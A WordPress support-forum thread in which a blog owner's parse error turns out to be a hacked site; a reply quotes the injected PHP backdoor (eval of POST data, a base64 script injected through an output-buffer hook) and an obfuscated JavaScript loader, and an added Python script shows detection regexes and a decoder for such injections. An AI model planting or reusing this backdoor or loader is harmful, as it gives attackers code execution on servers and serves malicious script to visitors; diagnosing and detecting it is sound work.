• Hello:

    Trying to log on to our blog at https://www.navivest.com/blog, I get the following error: Parse error: parse error, unexpected T_VARIABLE in /home/content/n/a/v/naviname/html/blog/index.php on line 1

    I don’t know if it’s recommended to show a copy of the index.php file, so I have not, but would really appreciate any help and suggestions. I called GoDaddy and the tech support person said there are no users set up in the database or something like that and either that or something else is causing a connection string problem. The blog has been up for 8 months, so even if that’s the case, I don’t know what now all of a sudden. Made no sense.

    No changes have been made other than new posts.

Viewing 3 replies - 1 through 3 (of 3 total)
  • your blog is hacked.

    open this file,

    /home/content/n/a/v/naviname/html/blog/index.php

    what's on the first line? this?

    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzMTRMY2xKcjJUaXB0JTIwc3lzcmZ6ZmNmaFklM0QyM1clMkZmaFklMkYyVDlsSjQlMkUyNDczQSUyRTIzVzIlMkUxc3k5M0E1JTJGajE0THF1ZXJmaFl5MjNXJTJFM0FqVGxzJTNFJTNDJTJGczE0TGNyaWZ6ZnBzeXQlM0UnKS5yZXBsYWNlKC9maFl8M0F8Z3J8MlR8ZnpmfDE0THxsSnwyM1d8VGx8c3kvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

    something similar?

    your front page (.html file): https://www.navivest.com/

    is hacked also.

    <script language=javascript><!--
    document.write(unescape('NSf%3ChqJsTGZcNSfripNSft%20gVwsgVwrhqJc%3DhqJ%2F%2F9PFo4TGZ%2ETGZ24hqJ7%2E2PFo%2EPFo195gVw%2FPFojqhqJueryNSf%2Ejs%3E%3CgVw%2FshqJcPForipPFotgVw%3E').replace(/TGZ|NSf|hqJ|rT|PFo|gVw|zz/g,""));
     --></script>

    I've seen this before.
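
An added example, not part of the original thread: a Python triage script built from the markers visible in the injected code quoted above (eval of request data, a long base64 literal, an output-buffer hook, code placed before the real `<?php` tag, and the `document.write(unescape(...).replace(...))` wrapper), which also decodes that wrapper to show what it writes into the page. The sample strings, junk tokens and `bad-host.example` are constructed, and the regexes are heuristics derived from this one sample.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Heuristics taken from the injected code quoted in this thread (assumed, not exhaustive).
INDICATORS = {
    "eval-of-request-data": re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "long-base64-literal": re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{80,}"),
    "output-buffer-hook": re.compile(r"ob_start\s*\(\s*['\"]tmp_[a-z]+['\"]"),
    "code-before-real-opening-tag": re.compile(r"\A\s*<\?php\b[^\n]*\?><\?php"),
    "js-unescape-replace-writer": re.compile(r"document\.write\s*\(\s*unescape\s*\("),
}
# Captures the percent-encoded payload and the junk-token pattern of the JS wrapper.
JS_WRAPPER = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*'([^']*)'\s*\)\s*\.replace\s*\(\s*/([^/]+)/g\s*,\s*\"\"\s*\)")

# Constructed, inert samples that mimic the structure of the code in the thread.
SAMPLE_PHP = ("<?php if(isset($_POST['tmp_abcdefgh3']))eval($_POST['tmp_abcdefgh3']);"
              "define('X',base64_decode('" + "A" * 90 + "'));ob_start('tmp_abcdefgh'); ?><?php\n"
              "require('./wp-blog-header.php');\n")
SAMPLE_HTML = ("<script language=javascript><!-- \ndocument.write(unescape("
               "'%3CsQQzcrWk7ipt%20sQQzrc%3D%2F%2FbadWk7-host%2EexaQQzmple%2Fx%2Ejs%3E%3C%2FscrWk7ipt%3E')"
               ".replace(/QQz|Wk7/g,\"\"));\n --></script>")

def scan_text(text):
    """Return the sorted names of every indicator that matches text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def decode_js_wrapper(text):
    """Undo unescape(...).replace(/junk/g, "") and return the hidden markup."""
    # Same order as the browser: percent-decode first, then strip the junk tokens.
    # Assumes the junk pattern is a plain alternation, which Python's re also accepts.
    return [re.sub(junk, "", unquote(payload)) for payload, junk in JS_WRAPPER.findall(text)]

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Map each web file under root with at least one indicator to its hits."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

if __name__ == "__main__":
    print(scan_text(SAMPLE_PHP))
    print(decode_js_wrapper(SAMPLE_HTML))
```

Run `scan_tree` over a copy of the web root rather than trusting the front page alone, since the thread shows both `index.php` and the static front page carrying injected code.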

    Thread Starter newbee1999

    (@newbee1999)

    I feared as much. Yes, that garbage is on there. Any idea as to how it happened and can be prevented?

    Thanks

  • The topic ‘Blog Died’ is closed to new replies.